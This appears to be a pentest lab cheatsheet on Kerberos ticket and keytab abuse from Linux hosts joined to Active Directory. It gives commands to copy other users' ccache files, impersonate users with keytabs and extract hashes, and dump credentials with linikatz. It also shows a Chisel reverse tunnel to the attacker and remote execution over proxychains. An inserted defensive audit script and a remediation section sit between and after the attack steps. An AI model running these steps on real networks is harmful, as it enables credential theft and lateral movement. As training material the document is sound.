Methodology Checklist
- Locate or extract ccache ticket (.ccache file or KRB5CCNAME env var)
- Import ticket: export KRB5CCNAME=/path/to/ticket.ccache
- Verify: klist
- Ensure /etc/hosts maps DC FQDN to IP
- Use Impacket tools with -k -no-pass: psexec, wmiexec, smbclient
- Convert ccache -> kirbi if needed: impacket-ticketConverter
- Debug double-hop issues: check for delegation or use /etc/krb5.conf
Operational Context
Use when: Kerberos ticket obtained from Linux pivot -> use ccache file for authentication to additional services without knowing passwords.
Think Dumber First: export KRB5CCNAME=/path/to/ticket.ccache then impacket-psexec -k -no-pass [DOMAIN]/[USER]@[TARGET]. The ticket in the ccache file authenticates the connection. No hash, no password: just the ticket.
Skip when: Ticket has expired (default 10-hour TGT lifetime) -> request a new ticket or pivot to PtH instead.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| realm list | Check if Linux host is domain-joined |
| ps -ef \| grep -i "winbind\|sssd" | Identify AD integration service |
| find / -name *keytab* -ls 2>/dev/null | Find keytab files on filesystem |
| crontab -l | Check cronjobs for kinit/keytab usage |
| env \| grep -i krb5 | Find current ticket via environment variable |
| ls -la /tmp | List ccache ticket files in /tmp |
| klist -k -t /opt/[FILE].keytab | Inspect keytab contents and principal name |
| kinit [USER]@[DOMAIN] -k -t /opt/[FILE].keytab | Impersonate user using keytab |
| smbclient //[DC]/[SHARE] -k -c ls | Access SMB share using active Kerberos ticket |
| python3 /opt/keytabextract.py [FILE].keytab | Extract NTLM/AES hashes from keytab |
| cp /tmp/krb5cc_[ID] . | Copy ccache ticket (requires root/owner) |
| export KRB5CCNAME=/root/krb5cc_[ID] | Set active ticket path |
| klist | Verify active ticket |
| smbclient //dc01/C$ -k -c ls -no-pass | Use ccache ticket to access DC share |
| impacket-ticketConverter ticket.ccache ticket.kirbi | Convert Linux ccache to Windows kirbi |
| impacket-ticketConverter ticket.kirbi ticket.ccache | Convert Windows kirbi to Linux ccache |
| proxychains impacket-wmiexec dc01 -k -no-pass | WMI exec through proxy using Kerberos ticket |
| proxychains evil-winrm -i dc01 -r [DOMAIN] | Evil-WinRM through proxy using Kerberos |
| bash linikatz.sh | Automated credential dump from Linux AD host (root required) |
Deep Dive & Workflow
Linux AD Integration: Two Credential Types

ccache files: live Kerberos tickets cached in /tmp
- Format: krb5cc_[UID]_[RANDOM]
- Location defined by the $KRB5CCNAME environment variable
- Can be stolen if you have root or file owner access

Keytab files: pre-shared keys for non-interactive authentication
- Used by service accounts and cron jobs to authenticate without user interaction
- If readable, can be used directly for kinit or to extract hashes
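As a defensive counterpart to the two credential types above, here is an added example (not from the original page) of a POSIX shell audit that flags ccache and keytab files readable by anyone other than their owner, and ccache files sitting outside the directory where they are expected; it assumes GNU find (for `-perm /` and `-printf`).

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet.
# Audit a directory tree for Kerberos credential files whose permissions
# let the group or others read them. A ccache (krb5cc_*) or keytab that is
# readable by a non-owner is exactly the file a foothold user can copy and
# reuse, so each hit is worth a ticket to the host owner.
# Output: one "<octal mode> <owner> <path>" line per weak file.
audit_krb_files() {
    dir="$1"
    # -perm /044: group-read or other-read bit set (GNU find syntax)
    find "$dir" \( -name 'krb5cc_*' -o -name '*.keytab' \) -type f \
        -perm /044 -printf '%m %u %p\n' 2>/dev/null
}

# Count of weak files, for alerting thresholds or a non-zero exit in cron.
count_weak_krb_files() {
    audit_krb_files "$1" | wc -l | tr -d ' '
}

# Ccache files are normally created under one directory (/tmp by default).
# List any krb5cc_* file under <root> that is NOT inside <allowed_dir>;
# such files suggest a copied or relocated ticket.
find_misplaced_ccache() {
    root="$1"
    allowed="$2"
    find "$root" -name 'krb5cc_*' -type f ! -path "$allowed/*" 2>/dev/null
}

# Stand-alone usage: audit the real system (assumes /tmp is the ccache dir).
if [ "${1:-}" = "--run" ]; then
    echo "[*] Credential files readable by non-owners:"
    audit_krb_files /
    echo "[*] Ccache files outside /tmp:"
    find_misplaced_ccache / /tmp
fi
```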
Keytab Exploitation

```bash
# 1. Inspect: note the exact principal name (case-sensitive!)
klist -k -t /opt/specialfiles/carlos.keytab
# 2. Impersonate
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
# 3. Verify and use
klist
smbclient //dc01/carlos -k -c ls
```

Alternatively, extract the hash and crack/reuse offline:

```bash
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
# Outputs: NTLM hash, AES128, AES256
```

ccache Ticket Theft

```bash
# Find tickets
ls -la /tmp
env | grep -i krb5
# Steal (requires root or owner)
cp /tmp/krb5cc_647401106_I8I133 /root/stolen.ccache
export KRB5CCNAME=/root/stolen.ccache
klist
# Use
smbclient //dc01/C$ -k -c ls -no-pass
```

Remote Attack via Pivot (Chisel + Proxychains)

When attacking through a compromised Linux host from your own machine:

```
# 1. /etc/hosts: map DC hostname
172.16.1.10 dc01.inlanefreight.htb inlanefreight.htb
# 2. /etc/proxychains.conf
socks5 127.0.0.1 1080
# 3. Chisel tunnel
./chisel server --reverse --port 8080 # attacker
./chisel client [LHOST]:8080 R:socks # compromised host
# 4. /etc/krb5.conf
[libdefaults]
default_realm = INLANEFREIGHT.HTB
[realms]
INLANEFREIGHT.HTB = { kdc = dc01.inlanefreight.htb }
# 5. Execute
export KRB5CCNAME=/home/kali/stolen.ccache
proxychains impacket-wmiexec dc01 -k -no-pass
proxychains evil-winrm -i dc01 -r inlanefreight.htb
```

Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| impacket-psexec returns "Clock skew too great" | Kerberos time sync required | ntpdate -u [DC_IP] or timedatectl set-ntp true; must be within 5 minutes of DC |
| ccache ticket not found | Wrong KRB5CCNAME path | Verify: ls -la /tmp/krb5* or ls /tmp/krb5cc_*; use absolute path in KRB5CCNAME |
| Ticket works for psexec but not wmiexec | SPN availability | Try impacket-wmiexec -k -no-pass; some services require a different SPN in the ticket |
| Ticket in Windows format (.kirbi) | Need ccache format | Convert: impacket-ticketConverter ticket.kirbi ticket.ccache |
| Ticket valid but target returns access denied | Ticket not for this service | Service tickets are service-specific; you need a TGT to request new service tickets |
Reporting Trigger
Finding Title: Kerberos Ticket Reuse Enables Lateral Movement Without Credentials
Impact: Stolen or forged Kerberos tickets allow authentication to domain services as the ticket owner without knowing the account password, enabling lateral movement that bypasses credential-based controls and leaves minimal authentication logs.
Root Cause: Kerberos tickets accessible in memory or ccache files with insufficient access controls. No behavioral monitoring for ticket-based authentication anomalies.
Recommendation: Implement Microsoft Defender for Identity to detect abnormal ticket usage patterns. Reduce ticket lifetime (default 10 hours) for privileged accounts. Implement PAC validation. Monitor for ccache files in non-standard locations.